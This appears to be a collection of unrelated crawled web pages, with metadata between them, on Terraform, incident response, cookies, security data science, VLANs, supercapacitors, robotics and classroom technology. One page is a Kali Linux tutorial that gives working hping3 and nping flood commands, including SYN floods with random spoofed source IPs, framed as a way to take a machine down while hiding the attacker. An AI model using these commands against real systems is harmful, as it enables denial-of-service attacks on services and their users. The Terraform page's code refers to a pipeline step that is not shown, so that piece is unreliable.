Terraform lets you split your configuration into modules. You should also consider splitting your whole infrastructure into separate projects. A "Terraform project" is a single piece of the infrastructure that can be introduced in multiple environments, typically using a single pipeline. Terraform projects will align with cloud designs like landing zones (Azure and AWS), Shared VPC, and hub-and-spoke network topologies. There are many examples in the Architecture Center, AWS Well-Architected Framework, Google Cloud Solutions, or the Azure Cloud Adoption Framework. One project is required when Terraform remote state files are stored in the cloud: a basic project that creates the infrastructure needed for the backends of the other projects. Avoid stateless projects. Have a separate project (or projects) to set up the presence in the cloud, a network, or a VPN connection. Building a landing zone is a separate subject.

Host Runtime Infrastructure

Runtime environments have a few requirements and pieces of infrastructure that may be shared between prod and non-prod environments, for example DNS, bastion hosts, and key vaults. This is also a good place to configure build agent pools separately for the production and non-prod environments. This is the infrastructure underneath the services and applications that run the business. Make sure that there is an environment for testing Terraform scripts, not just the application that is tested in it, to avoid interrupting QA work while applying potentially faulty Terraform configurations. Also, be prepared to separate runtime environments across teams, services, and departments; it may be difficult to have a single project with the entire organization's production environment.

There are many advantages to using Terraform as part of your infrastructure provisioning workflow. We face the challenges of delivering Terraform configurations at scale: on top of all major cloud providers, supporting large organizations in the highly regulated environment of financial services, with multiple teams working in environments in many regions around the world.
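As a sketch of the "plan, review manually, then apply" pipeline step described above, here is a minimal Python wrapper around the Terraform CLI; it assumes the CLI is on PATH and that the designated system account's credentials are injected by the CI system, and the prompt-based approval stands in for whatever approval gate your pipeline actually uses.

```python
# Minimal sketch: save a Terraform plan as an artifact, surface it for manual
# review, and apply exactly that plan only after approval.
import subprocess

def run(*args: str) -> None:
    subprocess.run(args, check=True)

run("terraform", "init", "-input=false")
run("terraform", "plan", "-input=false", "-out=tfplan")  # saved plan artifact
run("terraform", "show", "tfplan")                       # human-readable view for review

if input("Apply this exact plan? [y/N] ").strip().lower() == "y":
    # Applying the saved plan file guarantees that what was reviewed is what runs.
    run("terraform", "apply", "-input=false", "tfplan")
else:
    print("Plan rejected; nothing was applied.")
```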
<urn:uuid:d416abb4-11cd-49f1-81b4-a41437b092cd>
CC-MAIN-2022-40
https://www.kovair.com/blog/terraform-security-for-devops-guide/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00251.warc.gz
en
0.908277
2,059
2.578125
3
The purpose of an incident response plan is to prepare organizations for a possible security incident that could occur without notice. Having a strategic plan in place to address cybersecurity problems is crucial to preventing the financial and reputational consequences that can follow a breach or privacy incident. There are six main phases involved in an incident response plan. Each phase is important and should be completed in full before progressing to the next phase.

Among the most important of all the steps in an incident response plan is the preparation stage. During the preparation phase, organizations should establish policies and procedures for incident response management and enable efficient communication methods both before and after the incident. Employees should be properly trained to address security incidents and understand their respective roles. It is important for companies to develop incident response drill scenarios that are practiced on a regular basis and modified as needed based on changes in the environment. All aspects of an incident response plan, including training, software and hardware resources and execution, should be fully approved and funded before an incident occurs.

The identification phase of an incident response plan involves determining whether or not an organization has been breached. It is not always clear at first whether a breach or other security incident has occurred. In addition, breaches can originate from a wide range of sources, so it is important to gather details. When determining whether a security incident has occurred, organizations should look at when the event happened, how it was discovered and who discovered the breach. Companies should also consider how the incident will impact operations, whether other areas have been impacted and the scope of the compromise.

If it is discovered that a breach has occurred, organizations should work fast to contain the event. However, this should be done in the appropriate way and does not mean all sensitive data should simply be deleted from the system. Instead, strategies should be developed to contain the breach and prevent it from spreading further. This may involve disconnecting the impacted device from the internet or having a back-up system that can be used to restore normal business operations. Having remote access protocols in place can help ensure that a company never loses access to its systems.

Neutralization is one of the most crucial phases of the incident response process and requires the intelligence gathered throughout the previous stages. Once all systems and devices that have been impacted by the breach have been identified, an organization should perform a coordinated shutdown. To ensure that all employees are aware of the shutdown, employers should send out notifications to all other IT team members. Next, the infected systems and devices should be wiped clean and rebuilt. Passwords on all accounts should also be changed. If a business discovers that there are domains or IP addresses that have been affected, it is essential to block all communication that could pose a risk.

The recovery phase of an incident response plan involves restoring all affected systems and devices so that normal operations can continue. However, before getting systems back up and running, it is vital to ensure that the cause of the breach has been identified to prevent another breach from occurring.
During this phase, consider how long it will take to return systems to normal, whether systems have been patched and tested, whether a system can be safely restored using a backup, and how long the system will need to be monitored.

The final step in an incident response plan occurs after the incident has been resolved. Throughout the incident, all details should have been properly documented so that the information can be used to prevent similar breaches in the future. Businesses should complete a detailed incident report that suggests how to improve the existing incident plan. Companies should also closely monitor post-incident activities to look for threats. It is important to coordinate across all departments of an organization so that all employees are involved and can do their part to help prevent future security incidents.

Contact the Risk Management Consulting Experts at Hartman Executives

As security breaches and system hacks become more common due to advancements in technology, organizations must go the extra mile to protect their systems and devices. An incident response plan is an effective way to swiftly address security problems and gain knowledge that can be used to prevent repeat security problems. Organizations should also reach out to a risk management consultant to learn the best ways to protect and restore their business. The risk management consulting experts at Hartman Executive Advisors have extensive experience working with clients to assess their unique cybersecurity risks, as well as planning and implementing solutions to address these security issues.
<urn:uuid:1a3e4962-65d2-442a-8edc-42c83734557e>
CC-MAIN-2022-40
https://hartmanadvisors.com/the-6-phases-of-an-incident-response-plan/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00451.warc.gz
en
0.955606
914
2.890625
3
First off, the Cookie Law Explained

The Cookie Law, or more formally the GDPR privacy laws that will come into force on May 25, 2018 within the EU, is a piece of privacy legislation that will require websites to get consent from visitors to store or retrieve any information on a computer, smartphone or tablet. It was designed to protect online privacy by making consumers aware of how information about them is collected and used online, and giving them a choice to allow it or not. A little history and a good explanation can be found here: Cookie Law FAQ.

This law applies to any business anywhere that has a website (no matter the location) serving customers within any EU country, and such a business is required to comply with the legislation with respect to those EU visitors and that country.

What are Cookies and Why?

A cookie is a small piece of data sent from a website and stored on the user's computer by the user's web browser while the user is browsing. Cookies were designed to be a reliable mechanism for websites to remember stateful information or to record the user's browsing activity. The single most important job of a cookie is to keep a user logged in as they browse from page to page and tab to tab; this is stateful information.

Why do we use these tracking technologies and where?
- Analytical data for the purposes of tracking website usage.
- Contact forms, so we can respond to you.
- E-shop, so we can process your requests, keep track of your orders, etc.
- We only keep data where we may have legal obligations to do so, such as financial transactions, or where you opted in/out of a service we offer.
- In most cases, cookies, session data and user data are set to expire within 24 hours, with the exception of the e-shop or subscription services.

For further information about how to manage cookies, please refer to your browser's 'help', 'tools' or 'edit' section, or see: manage cookies. Please note that if you use your browser settings to block all cookies (including strictly necessary cookies) you may not be able to access or use all or parts or functionalities of our sites. If you want to remove previously stored cookies, you can manually delete the cookies at any time. However, this will not prevent the sites from placing further cookies on your device unless and until you adjust your Internet browser settings as described above.

Some useful links
<urn:uuid:46909352-61f4-41b3-bb19-d0714370d648>
CC-MAIN-2022-40
https://cfts.co/administrative-information/policies-and-notices
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00451.warc.gz
en
0.934684
685
2.671875
3
Today, CISOs and their teams are being asked lots of questions about risk by different types of stakeholders. Many of these questions require security professionals to analyze raw data from multiple sources, then communicate insight about impact, exposure, or priorities that's meaningful to people who are not security pros. This goal has many challenges, such as understanding raw data and analyzing it to produce accurate information that's helpful to a particular person's decision-making context. This is a skill in itself, and one that data scientists are uniquely placed to provide.

Security's Analysis and Communication Challenge

CISOs often face questions from business or governance, risk management, and compliance stakeholders that operational tools can't answer. This is either because tools are designed to meet a single operational security need rather than correlate data to answer a business risk question, or because tools are designed to "find bad" and detect when something goes wrong rather than enumerate risk. As a result, someone in the security team eventually must extract raw data from a technology "Frankenstack," put it into an analysis tool (spreadsheets by default), and then torture the data for answers to questions that inevitably get more complex over time. This is all before working out how best to communicate the output of data analysis to clearly answer "So what?" and "What now?"

How Data Science Can Help

Asking questions of raw data from one source, let alone multiple sources, isn't easy. First you have to understand the data that your security tools put out and any quirks that exist (such as timestamps and field names). In data science, data preparation is one of the most important stages of producing insight. It involves understanding what questions a data set can answer, the limits of the data set (that is, what information is missing or invalid), and looking at other data sets that can improve completeness of analysis where a single data set is not sufficient.

Then comes the job of selecting the most appropriate analysis method to answer the question at hand. Data scientists have a spectrum of methods they can use, which are suitable for extracting different information from data. Data science as a discipline will consider multiple factors to deliver the most meaningful information in the time available, all with appropriate caveats. For example, what is the current state of knowledge on this topic? What does the consumer of analysis want to know? The answers here will set the bar for the complexity of analysis required to learn something new. For example, if a data set hasn't been analyzed before, simple stats can provide valuable insight quickly. Then there's the inevitable trade-off between speed to results on one hand and precision on the other. Based on all this, the best analysis method could be simple counts or using a machine learning algorithm.

Finally comes communication. What view of the data does a decision maker need? For example, the view of vulnerability will be different for a CISO who needs insight for a strategic quarterly meeting when compared with a vulnerability manager who needs to prioritize what to fix at a tactical level. While these views will be built from the same raw data, the summary for each requires different caveats, because as you summarize, you inevitably exclude details.

Merging Data Science and Domain Expertise

Data scientists can't, and shouldn't, work in a silo away from the security team.
Far more value is gained by combining their expertise in understanding, analyzing, and communicating data with the domain expertise of security professionals who understand the problem and the questions that need answering. As more security departments start working with data scientists, here are three key factors to bear in mind:
- Time: Understanding multiple data sets, applying the most relevant analysis techniques to them, and delivering meaningful insights based on what question needs answering won't happen overnight. It takes time.
- Domain expertise: There will be gaps in knowledge between your data scientist and your security team. Working in close partnership is critical. Just as you're getting used to constraints the data scientist has discovered in the data you have, so too is your data scientist coming to grips with new and usually complex log formats in an effort to see what's possible.
- The needs of your consumers: Communicating and visualizing insight from data requires different analysis for different roles. The CISO, control manager, IT operations, and C-suite all have different needs, and your data scientist must learn about these roles to strike the right balance between conclusions and caveats for each one.
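To ground the data-preparation and "different views for different roles" points above, here is a minimal, hypothetical pandas sketch; the file names, column names, and thresholds are invented for illustration.

```python
# Minimal sketch: join a vulnerability-scan export with an asset inventory,
# then summarize the same raw data two ways for two different audiences.
import pandas as pd

scans = pd.read_csv("vuln_scan.csv")         # e.g. host, cve, cvss, first_seen
assets = pd.read_csv("asset_inventory.csv")  # e.g. host, owner, business_unit, internet_facing

# Keep scan rows even when the inventory is incomplete (a common data quirk).
df = scans.merge(assets, on="host", how="left")

# Tactical view: what should the vulnerability manager fix first?
tactical = df.sort_values("cvss", ascending=False).head(20)

# Strategic view: internet-facing exposure per business unit for the CISO deck.
strategic = (
    df[df["internet_facing"] == True]
    .groupby("business_unit")["cve"]
    .nunique()
    .sort_values(ascending=False)
)

print(tactical[["host", "cve", "cvss"]].to_string(index=False))
print(strategic.to_string())
```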
<urn:uuid:2954cf56-4afd-4d56-9b6d-432eace2a6e0>
CC-MAIN-2022-40
https://www.darkreading.com/threat-intelligence/data-science-security-overcoming-the-communication-challenge
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338073.68/warc/CC-MAIN-20221007112411-20221007142411-00451.warc.gz
en
0.938759
938
2.53125
3
A VLAN is a group of switch ports administratively configured to share the same broadcast domain.

Private VLANs: Private VLANs (PVLANs) are used mainly by service providers. The main purpose of a Private VLAN (PVLAN) is to provide the ability to isolate hosts at Layer 2 instead of Layer 3. By using PVLANs we split a broadcast domain into smaller broadcast domains. In other words, we may summarize Private VLANs as "VLANs inside a VLAN".

The table below lists the differences between the two:

Comparison Table: VLAN vs Private VLAN

| # | VLAN | Private VLAN |
| 1 | Different VLANs must belong to different IP subnets. | PVLANs belong to the same IP subnet. |
| 2 | VLANs work at Layer 2 and Layer 3. | PVLAN is a method to segment devices at Layer 2. |
| 3 | VLANs are the basic requirement for any LAN. | PVLANs are used for specific requirements where endpoints in the same VLAN should not communicate with each other, e.g. mainly in ISP scenarios to prevent different customers from communicating with each other on the same LAN segment. |
| 4 | Inter-VLAN communication is performed at the L3 SVI level. | PVLAN-to-outside communication is performed via the Primary VLAN. |

Download the difference table: VLAN vs Private VLAN.
<urn:uuid:cd542fa0-3623-46e3-b656-eed0c75b867d>
CC-MAIN-2022-40
https://ipwithease.com/vlan-vs-private-vlan/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335124.77/warc/CC-MAIN-20220928051515-20220928081515-00651.warc.gz
en
0.852633
319
3.28125
3
A capacitor is a passive electronic component that stores electrical energy in an electrostatic field. This is unlike a battery, which stores energy in a chemical form. Capacitors are formed from two conducting plates separated by an insulator. The amount of capacitance is proportional to the surface areas of the plates, and inversely proportional to the separation between the plates. Nanomaterial supercapacitors use nanomaterials, which dramatically increases the surface area and the amount of energy that can be stored.
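As a compact statement of the proportionality described above, the standard parallel-plate capacitor formula (implied by, but not spelled out in, the text) is:

```latex
C = \frac{\varepsilon_0 \varepsilon_r A}{d}
```

where A is the plate area, d is the separation between the plates, and ε0 and εr are the permittivity of free space and the relative permittivity of the insulator; increasing the effective surface area A (as nanomaterial electrodes do) raises the capacitance, while increasing the separation d lowers it.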
<urn:uuid:bb6a354d-b169-48de-80d3-b7aaa0b45cb6>
CC-MAIN-2022-40
https://www.gartner.com/en/information-technology/glossary/nanomaterial-supercapacitors
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00651.warc.gz
en
0.920048
101
3.796875
4
Maintenance Robots are the Future
The Wall Street Journal says that factory workers have a new sense of job security, so let's ruin it. This week, Rolls-Royce offered an exciting new look at the future of engine maintenance. Well, it's exciting to everyone except maybe maintenance professionals. Rolls-Royce partnered with Harvard University and the University of Nottingham to discuss the role robotics will play in the future of engine maintenance. The company calls it the IntelligentEngine and the technologies could not only speed inspection and maintenance work, but could also reduce the cost as engines could stay on the aircraft. At the Farnborough Airshow, Rolls-Royce showed off four technologies currently in various stages of development: INSPECT robots, remote boreblending robots, FLARE robots, and SWARM robots. The INSPECT robots are a network of periscopes that are embedded into the engine to detect any anomalies. The remote boreblending robots could be an answer to the skills shortage as it's a tool that local teams would install in the engine and then hand over remote access to specialist engineers — and we're talking about mission critical parts, like repairing damaged blades with lasers. The FLARE robots are a pair of snake robots that work like an endoscope to make patch repairs, and the SWARM robots are a set of small 10-mm robots that would be deployed in the center of an engine, via a snake robot, and perform visual inspections. Some technologies, like the SWARM robots, are far from a reality, but the remote robot is already being tested. It will be interesting to see if and when these technologies spread to other industries.
Flying Bum Gets Luxurious
The Airlander 10 has been called the world's biggest aircraft, but it is likely most famous for its nickname, the "Flying Bum". A hybrid of a blimp, helicopter and airplane, the 302-foot Airlander 10 is powered by four 325-hp turbocharged diesel engines and can fly for days at a time. But we haven't heard much from the Flying Bum over the last two years. Other than bad news, like in August 2016 when the blimp-shaped airship sustained damage after a rough landing, or when it broke free of its mooring mast in November 2017 and deflated as a safety precaution. The aircraft was originally developed for the U.S. military for use in surveillance. However, according to New Atlas, Hybrid Air Vehicles (HAV), the company behind the Flying Bum, is developing a luxury version of the airship aimed at the tourism market. The company revealed concept photos at the Farnborough International Airshow that were designed by UK-based Design Q. They include glass bottoms, luxury seating throughout a 150-foot passenger cabin, an Altitude Bar, and private bedrooms. The luxury edition is designed to accommodate 19 passengers at a time, hopefully not all in the bedroom at the same time.
Engineers Sign Pledge Against Killer Robots
Engineers, scientists, tech leaders and hosts of weekly engineering shows have signed a pledge against killer robots. The statement was signed by 2,400 individuals, including Elon Musk, Toby Walsh, and yours truly who promise to "neither participate in nor support the development, manufacture, trade, or use of lethal autonomous weapons". The pledge was organized by the Future of Life Institute and released at the 2018 International Joint Conference on Artificial Intelligence in Stockholm.
According to a recent report, the industry employs about 300,000 AI engineers, so either the pledge didn't have good word of mouth, or 99.2% of AI professionals are hellbent on the fall of man. The issue at hand is killer robots, also known, perhaps ironically, as lethal autonomous weapons systems (or LAWS). These are weapons that can identify, target, and kill a person, without a human 'in-the-loop'. The pledge is a call to governments and leaders to help create a future with laws against LAWS. Toby Walsh, a professor of artificial intelligence at Australia's University of New South Wales in Sydney, said, "We cannot hand over the decision as to who lives and who dies to machines."
Here is the pledge:
Artificial intelligence (AI) is poised to play an increasing role in military systems. There is an urgent opportunity and necessity for citizens, policymakers, and leaders to distinguish between acceptable and unacceptable uses of AI. In this light, we the undersigned agree that the decision to take a human life should never be delegated to a machine. There is a moral component to this position, that we should not allow machines to make life-taking decisions for which others – or nobody – will be culpable. There is also a powerful pragmatic argument: lethal autonomous weapons, selecting and engaging targets without human intervention, would be dangerously destabilizing for every country and individual. Thousands of AI researchers agree that by removing the risk, attributability, and difficulty of taking human lives, lethal autonomous weapons could become powerful instruments of violence and oppression, especially when linked to surveillance and data systems. Moreover, lethal autonomous weapons have characteristics quite different from nuclear, chemical and biological weapons, and the unilateral actions of a single group could too easily spark an arms race that the international community lacks the technical tools and global governance systems to manage. Stigmatizing and preventing such an arms race should be a high priority for national and global security. We, the undersigned, call upon governments and government leaders to create a future with strong international norms, regulations and laws against lethal autonomous weapons. These currently being absent, we opt to hold ourselves to a high standard: we will neither participate in nor support the development, manufacture, trade, or use of lethal autonomous weapons. We ask that technology companies and organizations, as well as leaders, policymakers, and other individuals, join us in this pledge.
This is Engineering By Design.
<urn:uuid:77e88728-4038-4b5a-a437-cc14fee0df8a>
CC-MAIN-2022-40
https://www.mbtmag.com/home/video/21102073/engineering-by-design-engineers-sign-pledge-against-killer-robots
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.37/warc/CC-MAIN-20220930212504-20221001002504-00651.warc.gz
en
0.948337
1,207
2.6875
3
Federal Government agencies have released report after report (since 1999 with Columbine) pointing out the same thing, there is no profile of mass shooters. So you might be asking, how can we prevent something we can't profile? The good news is, there is something we can profile, and that's failed prevention efforts. If we can profile failed preventions, we can turn those lessons learned into lessons implemented. Click play to learn more, then visit the Prevention Deeper Dive to see what the 20+ years of research reveal. Ready for more? Prevention & Lessons Learned Deeper Dive A LESSON LEARNED IS KNOWLEDGE GAINED FROM INCIDENTS, NEAR MISSES, TRAGEDIES, LAWSUITS, ETC. KNOWLEDGE GAINED FROM LESSONS LEARNED ARE JUST "RECIPES" UNTIL THEY BECOME LESSONS IMPLEMENTED THAT EMPOWER AND EQUIP PEOPLE WITH THE RIGHT STRATEGIES AND TOOLS TO TAKE REAL ACTIONS THAT LEAD TO BETTER RESULTS. Lessons Learned from attacks, cyberattacks, violence, suicide, and other incidents are shared in numerous news articles across numerous websites, software updates, press releases, etc. on a daily basis and could even be coming directly from your internal departments too. Watch the 15-minute video below to take a deeper dive into 20+ years of research so you can get better prevention results today!
<urn:uuid:a4761ad9-8995-4f48-b995-a241e3cc5c83>
CC-MAIN-2022-40
https://www.awareity.com/2021/06/17/prevention-profile-of-mass-shooters-vs-profile-of-failed-preventions/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00651.warc.gz
en
0.85169
334
2.546875
3
In computing, a denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users. Although the means to carry out, the motives for, and the targets of a DoS attack vary, it generally consists of efforts to temporarily or indefinitely interrupt or suspend the services of a host connected to the Internet. In this article I will show how to carry out a denial-of-service attack, or DoS, using hping3 with a spoofed IP in Kali Linux. As clarification, distributed denial-of-service attacks are sent by two or more persons, or bots, and denial-of-service attacks are sent by one person or system. As of 2014, the frequency of recognized DDoS attacks had reached an average rate of 28 per hour. Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers. Denial-of-service threats are also common in business, and are sometimes responsible for website attacks. This technique has now seen extensive use in certain games, used by server owners or disgruntled competitors, such as on popular Minecraft servers. Increasingly, DoS attacks have also been used as a form of resistance. Richard Stallman has stated that DoS is a form of 'Internet Street Protests'. The term is generally used relating to computer networks, but is not limited to this field; for example, it is also used in reference to CPU resource management. One common method of attack involves saturating the target machine with external communications requests, so much so that it cannot respond to legitimate traffic, or responds so slowly as to be rendered essentially unavailable. Such attacks usually lead to a server overload. In general terms, DoS attacks are implemented either by forcing the targeted computer(s) to reset, by consuming their resources so that they can no longer provide their intended service, or by obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately. Denial-of-service attacks are considered violations of the Internet Architecture Board's Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers. They also commonly constitute violations of the laws of individual nations. hping3 works well if you have other DoS tools such as GoldenEye running (using multiple tools that attack the same site/server/service increases the chances of success). There are agencies and corporations that run DoS attack maps in real time, showing worldwide DDoS attacks almost as they happen.
Our take on Denial-of-service Attack – DoS using hping3
Let's face it, you installed Kali Linux to learn how to DoS, how to crack into your neighbor's wireless router, how to hack into a remote Windows machine, be that a Windows 2008 R2 server or Windows 7, or how to hack a website using SQL injection. There are lots of guides that explain it all. In this guide, I am about to demonstrate how to DoS using hping3 with random source IPs on Kali Linux. That means:
- You are executing a denial-of-service attack, or DoS, using hping3.
- You are hiding your a$$ (I meant your source IP address).
- Your destination machine will see traffic from random source IP addresses rather than yours (IP masquerading).
- Your destination machine will get overwhelmed within 5 minutes and stop responding.
Sounds good? I bet it does.
But before we go and start using hping3, let's just go over the basics. hping3 is a free packet generator and analyzer for the TCP/IP protocol. Hping is one of the de facto tools for security auditing and testing of firewalls and networks, and was used to exploit the idle scan technique now implemented in the Nmap port scanner. The new version of hping, hping3, is scriptable using the Tcl language and implements an engine for string-based, human-readable description of TCP/IP packets, so that the programmer can write scripts related to low-level TCP/IP packet manipulation and analysis in a very short time. Like most tools used in computer security, hping3 is useful to security experts, but there are a lot of applications related to network testing and system administration. hping3 should be used to:
- Traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities.
- Perform the idle scan (now implemented in nmap with an easy user interface).
- Test firewalling rules.
- Test IDSes.
- Exploit known vulnerabilities of TCP/IP stacks.
- Do networking research.
- Learn TCP/IP (hping was used in networking courses AFAIK).
- Write real applications related to TCP/IP testing and security.
- Run automated firewalling tests.
- Build proof-of-concept exploits.
- Support networking and security research when there is the need to emulate complex TCP/IP behaviour.
- Prototype IDS systems.
- Build simple-to-use networking utilities with a Tk interface.
hping3 is pre-installed on Kali Linux like many other tools. It is quite useful and I will demonstrate its usage soon.
DoS using hping3 with random source IP
That's enough background; I am moving on to the attack. You only need to run a single-line command as shown below:
    root@kali:~# hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source www.hping3testsite.com
    HPING www.hping3testsite.com (lo 127.0.0.1): S set, 40 headers + 120 data bytes
    hping in flood mode, no replies will be shown
    ^C
    --- www.hping3testsite.com hping statistic ---
    1189112 packets transmitted, 0 packets received, 100% packet loss
    round-trip min/avg/max = 0.0/0.0/0.0 ms
    root@kali:~#
Let me explain the options used in this command:
- hping3 = name of the application binary.
- -c 10000 = number of packets to send.
- -d 120 = size of each packet sent to the target machine.
- -S = send SYN packets only.
- -w 64 = TCP window size.
- -p 21 = destination port (21 being the FTP port). You can use any port here.
- --flood = send packets as fast as possible, without taking care to show incoming replies. Flood mode.
- --rand-source = use random source IP addresses. You can also use -a or --spoof to hide hostnames. See the man page below.
- www.hping3testsite.com = destination IP address or target machine's IP address. You can also use a website name here. In my case it resolves to 127.0.0.1 (as entered in my hosts file).
So how do you know it's working? In hping3 flood mode, we don't check the replies received (actually you can't, because in this command we've used the --rand-source flag, which means the source IP address is not yours anymore). It took me just 5 minutes to make this machine completely unresponsive (that's the definition of DoS – denial of service). In short, if this machine were a web server, it wouldn't be able to respond to any new connections, and even if it could, it would be really, really slow.
Sample commands to DoS using hping3 and nping
I found this article, which I found interesting and useful.
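If you want to confirm the effect from the target side rather than just waiting for it to stop responding, a few stock Linux commands are enough. This is a hedged sketch for a lab machine you control; the interface name eth0 is an assumption:

    # Count half-open (SYN_RECV) connections piling up on the target:
    ss -nt state syn-recv | wc -l

    # Watch interface packet counters climb while the flood runs:
    watch -n 1 cat /proc/net/dev

    # Capture a small sample of the incoming SYNs and their (spoofed) sources:
    tcpdump -ni eth0 'tcp[tcpflags] & tcp-syn != 0' -c 20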
I've only modified them to work and demonstrate with Kali Linux (as their formatting and syntaxes were broken – I assume on purpose :) ). These are not written by me. Credit goes to Insecurety Research.
Simple SYN flood – DoS using HPING3
    root@kali:~# hping3 -S --flood -V www.hping3testsite.com
    using lo, addr: 127.0.0.1, MTU: 65536
    HPING www.hping3testsite.com (lo 127.0.0.1): S set, 40 headers + 0 data bytes
    hping in flood mode, no replies will be shown
    ^C
    --- www.hping3testsite.com hping statistic ---
    746021 packets transmitted, 0 packets received, 100% packet loss
    round-trip min/avg/max = 0.0/0.0/0.0 ms
    root@kali:~#
Simple SYN flood with spoofed IP – DoS using HPING3
    root@kali:~# hping3 -S -P -U --flood -V --rand-source www.hping3testsite.com
    using lo, addr: 127.0.0.1, MTU: 65536
    HPING www.hping3testsite.com (lo 127.0.0.1): SPU set, 40 headers + 0 data bytes
    hping in flood mode, no replies will be shown
    ^C
    --- www.hping3testsite.com hping statistic ---
    554220 packets transmitted, 0 packets received, 100% packet loss
    round-trip min/avg/max = 0.0/0.0/0.0 ms
    root@kali:~#
TCP connect flood – DoS using NPING
    root@kali:~# nping --tcp-connect --rate=90000 -c 900000 -q www.hping3testsite.com
    Starting Nping 0.6.46 ( http://nmap.org/nping ) at 2014-08-21 16:20 EST
    ^C
    Max rtt: 7.220ms | Min rtt: 0.004ms | Avg rtt: 1.684ms
    TCP connection attempts: 21880 | Successful connections: 5537 | Failed: 16343 (74.69%)
    Nping done: 1 IP address pinged in 3.09 seconds
    root@kali:~#
Source: Insecurety Research
Any modern firewall will block it, and most Linux kernels come with built-in SYN flood protection these days. This guide is meant for research and learning purposes. For those who are having trouble with TCP SYN or TCP connect floods, try learning iptables and figure out how you can block DoS attacks from hping3, nping, or any other tool. You can also DoS using GoldenEye, a layer 7 DoS attack tool that simulates similar attacks, or use a PHP exploit to attack WordPress websites.
P.S. I've included the hping3 manpage on the next page in case you want to look it up. Please share and RT.
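Since the article points readers at iptables for defense, here is a minimal, hedged sketch of common SYN-flood mitigations on a Linux target. The numbers are illustrative assumptions, not tuned recommendations, and none of this is a complete defense against a distributed or spoofed-source flood:

    # SYN cookies let the kernel survive SYN floods without exhausting the
    # half-open connection backlog (enabled by default on most distributions):
    sysctl -w net.ipv4.tcp_syncookies=1

    # Crude global rate limit for new SYN packets with iptables:
    iptables -N SYN_LIMIT
    iptables -A INPUT -p tcp --syn -j SYN_LIMIT
    iptables -A SYN_LIMIT -m limit --limit 25/second --limit-burst 50 -j RETURN
    iptables -A SYN_LIMIT -j DROP

Note that per-source-IP limits (for example with the recent or hashlimit matches) are of limited use here, because --rand-source gives every packet a different spoofed source address.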
<urn:uuid:5963a1a2-a5c9-4326-affe-8dee4a62e4ab>
CC-MAIN-2022-40
https://www.blackmoreops.com/2015/04/21/denial-of-service-attack-dos-using-hping3-with-spoofed-ip-in-kali-linux/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00651.warc.gz
en
0.878402
2,336
2.96875
3
With technological advancements becoming more integrated into education standards, each year experts predict that the tipping point is coming, when digital resources such as online courses and tablet-based teaching implements become so intertwined that they become inseparable from our notion of basic education. While those predictions have yet to fully pan out, Dr. Michael Fullan, Professor Emeritus at the Ontario Institute for Studies in Education at the University of Toronto, expects 2013 to be the year school districts finally make the leap into 21st Century technology. A successful implementation of new tech, however, depends on the willingness of North American teachers to embrace the shifting academic landscape.
Keeping up with tech trends
The esteemed professor recently lent his expertise on education to MindShare Learning, offering his predictions for the coming year. He found that technological innovation in the classroom will rely heavily on teachers' ability to implement those changes, as well as a commitment to their own continued education in the form of Professional Development. Teachers who are serious about staying up to date with the latest tech trends and their potential educational applications will go to great lengths to keep themselves apprised of emerging technology and become acquainted with its functionality.
Professional Development is key
Fullan expects more teachers to embrace Professional Development in 2013, predicting that the number of professional learning communities (PLCs) will continue to rise as educators develop a network of resources to keep their knowledge of educational technology relevant. Examining a study conducted by the Stanford Center for Opportunity Policy in Education, Education Week found a positive correlation between the performance of a country's education system and the amount of time its teachers dedicated to professional development. Educators have more resources for professional development at their disposal than ever before, with webinars, online courses and social media options becoming more prevalent. If a teacher wants to expand his or her expertise on an emerging high-tech teaching implement, the resources to do so are plentiful.
Better resources in the classroom
Teachers can expect better support from their school districts, as well. Fullan suggested the declining costs of computers, tablets and internet installation will likely lead to better resources being available to educators. Fullan expects school board leaders to begin to acknowledge the importance of having quick, easily accessible computers in the classroom and will move to outfit them with the latest models. An increased adoption rate of BYOD policies should further supplement the quality of computers available in schools, as teachers are increasingly allowed to bring in their personal laptops and tablets to replace sluggish and outdated classroom computers. With better hardware, teachers can begin to integrate emerging educational advancements such as online courses and textbooks into the classroom experience. There are many roadblocks to full-scale implementation of the newest educational innovations. Budget concerns, teachers' unfamiliarity with recent technological advancements and a public distrust of change all stand in the way of making the blended classroom a reality.
However, as costs go down and the public and teachers become more tech savvy, school districts are becoming more willing to embrace a new academic landscape, where teaching resources are as much digital as they are physical. Will 2013 be a landmark year for technological innovation in schools? Are blended classrooms the future of academics in North America? Should they replace the old model of primary and secondary education? Tell us what you think in the comments section below!
<urn:uuid:85c9b3ac-eecb-4234-b11f-c7233ecc8ad5>
CC-MAIN-2022-40
https://www.faronics.com/news/blog/teachers-to-jump-into-the-tech-waters-in-2013
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00651.warc.gz
en
0.96059
661
3.09375
3
